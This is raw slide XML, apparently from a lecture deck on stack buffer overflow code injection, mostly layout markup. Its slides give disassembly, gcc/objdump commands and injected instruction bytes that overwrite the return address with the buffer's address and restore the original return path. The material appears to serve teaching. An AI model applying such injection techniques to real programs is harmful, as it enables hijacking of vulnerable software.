                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB722E97-DF9E-CD46-BF75-88C5B01C2DD0}"/>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FBCF1E-7558-1F43-9206-C9D6C20E0778}"/>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9CB863-457F-1E43-B3F9-C7D5B4600137}"/>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BA4F04C-C736-9740-9301-26DEF68FB475}"/>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50FC02-E59C-4644-A998-C9B46D0F403D}"/>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8EA02A2-19B2-A042-8DE4-D23C8A5480FD}"/>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10EAEF-74B7-4F43-93EE-1025F045552E}"/>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914C18-A8CD-4F4A-ABE5-CAB10594955C}"/>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A9A35CA-562F-C343-86F0-B316A37AD23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34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE7C1AB-4A8C-8345-8962-CC0837F782A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="33"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id="{80ADDB45-FA98-3540-879C-D56DABBB1B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429432" y="3986007"/>
            <a:ext cx="750197" cy="1628522"/>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5BC7A5BD-4DDD-0947-A55B-B0906DAD05E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429432" y="455729"/>
            <a:ext cx="750197" cy="2949772"/>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094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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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35">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolv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9"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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35">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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35">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37"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12" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1"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Our attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24BD71B-BF7F-4D4C-B0F2-FBB4E317BC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will inject code to cause the program to execute as though nothing had happened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put the original return address where the stack pointer will find it, and then return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7425C882-B73D-BE44-8818-104DA8B19153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="4150384"/>
            <a:ext cx="7204753" cy="1822542"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="1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FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a:   48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 08         sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:   b8 00 00 00 00      mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:   e8 b7 ff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4005ff &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buffer_too_small</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400648:   bf 30 07 40 00      mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:   e8 7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ff ff      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4004d0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400652:   48 83 c4 08         add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656:   c3                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Elbow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03D5628-976F-AB4D-9203-A8F69FA786E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4419603" y="5163226"/>
            <a:ext cx="979710" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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3624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39EE4C-935B-2A4A-AB9E-BD715EA3B07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option 1</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86D2843D-BE79-334E-A88D-A3B2A18235AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2029326"/>
            <a:ext cx="3129645" cy="868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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  $0x400648, (%</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1" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62355F4-AB98-C54C-922A-FFFDF3A9619F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3154956"/>
            <a:ext cx="8882743" cy="30281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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c option1.s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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d option1.o</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option1.o:     file format elf64-x86-64</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Disassembly of section .text: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0000000000000000 &lt;.text&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       0:    48 c7 04 24 48 06 40   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x400648,(%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7:    00 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       8: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207045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39EE4C-935B-2A4A-AB9E-BD715EA3B07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option 2</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86D2843D-BE79-334E-A88D-A3B2A18235AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2029326"/>
            <a:ext cx="3129645" cy="86856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a:t>
            </a:r>
          </a:p>
          <a:p>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1" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62355F4-AB98-C54C-922A-FFFDF3A9619F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3154956"/>
            <a:ext cx="8882743" cy="30281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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c option2.s </a:t>
            </a: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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d option2.o</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option2.o:     file format elf64-x86-64</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Disassembly of section .text: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0000000000000000 &lt;.text&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       0:    68 48 06 40 00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$4195912</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       5: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173448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Our Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F6597E-B250-EE49-B2A2-D092CD66049E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5421086" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll put our attack string between the buffer and the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The push instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(the buffer’s address)</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3E4F3F9C-C3E6-D144-92C1-527F41720523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933FE4E1-8ABE-E543-9D58-96F9493024CB}"/>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82EB00A6-9E35-CE45-B6D7-7CEA69538480}"/>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12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E2A67B-1936-074A-AF48-DB64EFFF2455}"/>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4D0C1969-D125-F04E-ACED-4BABA72FC2D9}"/>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14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04FDE50B-280C-2745-89D7-837D7936E7D8}"/>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DD159676-F406-BF48-AD51-1F7D13409ED4}"/>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16" name="Straight Arrow Connector 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C47B543-6F0B-7B47-B268-8253BED5D168}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15"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F8CD4001-858C-ED43-94EC-BFEAF5F185D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFDF873-649D-3448-A7F4-DE2BEBE6BD09}"/>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7099A9E-D568-D14B-8FCF-3341D56D1E9C}"/>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E07BF67-6227-A44E-BBAD-08B3B32E2782}"/>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8827FD-9C55-3746-B070-DA032782161C}"/>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451BDF8-CF5A-C94A-8426-E5B9C3D08CE4}"/>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262DCA-0F4C-C745-9437-1C0CEC8903B4}"/>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FEB260-DEDA-5342-97D9-647F3FB3A41D}"/>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9925A6-399C-164D-902F-2FBCE3093A20}"/>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A0AAE2C-DB21-3349-B99C-AC5CE936E8AB}"/>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27" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87570ACF-B578-224F-8907-115C853E97C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26"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10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146819"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refresher on Memory Layout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F15EDEA-CF64-9E4E-AF31-E3AB3A7055F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1876709" y="406603"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7C4400-EA24-D14A-890D-3CE7B13394EF}"/>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0" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A6BBF8-AFFD-B54A-98BD-881940F3BE01}"/>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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED486A75-0E27-A146-B5D5-3D90CE05D4EC}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7DECB0-A884-5244-9827-CDE2E907B478}"/>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412BB2C-11D2-7D44-ABAC-AF3C51982CD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4" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B8E799-790A-9640-98F8-680F7F45E80D}"/>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5" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2F27C6-69A9-F845-BADD-8D92BF122337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161B78C6-3A74-4C42-A7E0-1C652D7F8D3E}"/>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7" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671925DF-4169-0442-9B0B-ECCCE80A9BEB}"/>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18" name="Straight Arrow Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
